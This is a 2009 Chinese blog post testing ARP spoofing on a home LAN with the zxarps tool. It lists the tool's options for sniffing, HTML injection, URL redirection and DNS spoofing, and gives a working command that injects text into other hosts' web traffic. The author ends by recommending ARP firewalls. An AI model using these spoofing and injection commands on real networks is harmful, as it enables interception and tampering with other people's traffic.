Arp 欺骗
作者:阿圣(Sfan) 发布于:2009-8-22 11:58 Saturday 分类:计算机
在网上看到一篇关于arp 欺骗的文章..下载了相关的工具测试了一下~
工具:zxarps (需安装 WinPcap)搜索引擎上面能找到这些工具.
zxarps 相关的命令
- options:
- -idx [index] 网卡索引号
- -ip [ip] 欺骗的IP,用'-'指定范围,','隔开
- -sethost [ip] 默认是网关,可以指定别的IP
- -port [port] 关注的端口,用'-'指定范围,','隔开,没指定默认关注所有端口
- -reset 恢复目标机的ARP表
- -hostname 探测主机时获取主机名信息
- -logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,
- ','隔开关键字,多个条件'|'隔开
- 所有带+前缀的关键字都出现的包则写入文件
- 带-前缀的关键字出现的包不写入文件
- 带_前缀的关键字一个符合则写入文件(如有+-条件也要符合)
- -save_a [filename] 将捕捉到的数据写入文件 ACSII模式
- -save_h [filename] HEX模式
- -hacksite [ip] 指定要插入代码的站点域名或IP,
- 多个可用','隔开,没指定则影响所有站点
- -insert [html code]指定要插入html代码
- -postfix [string] 关注的后缀名,只关注HTTP/1.1 302
- -hackURL [url] 发现关注的后缀名后修改URL到新的URL
- -filename [name] 新URL上有效的资源文件名
- -hackdns [string] DNS欺骗,只修改UDP的报文,多个可用','隔开
- 格式: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1
- -Interval [ms] 定时欺骗的时间间隔,默认是3秒
- -spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者
- -speed [kb] 限制指定的IP或IP段的网络总带宽,单位:KB
写了一条命令:zxarps.exe -idx 0 -ip 192.168.1.100-192.168.1.200 -port 80 -insert "just for fun By:Sfan<noframes>"
运行后...到同局域网的另一台电脑 IP:192.168.1.102 上面测试效果 :(机器上面没有装第三方防火墙.有装瑞星杀软)打开IE输入百度后.浏览器正确的显示了插入的代码内容.同时本机提示 "成功插入代码" ~
本机命令运行状态:
zxarps 还有嗅探等相关的功能.能想象得到.当年arp 病毒.有多么可怕.局域网用户还是装上arp 防火墙.更安全 360安全卫士也有带arp 防火墙工具.默认是关闭的需要用户自己开启.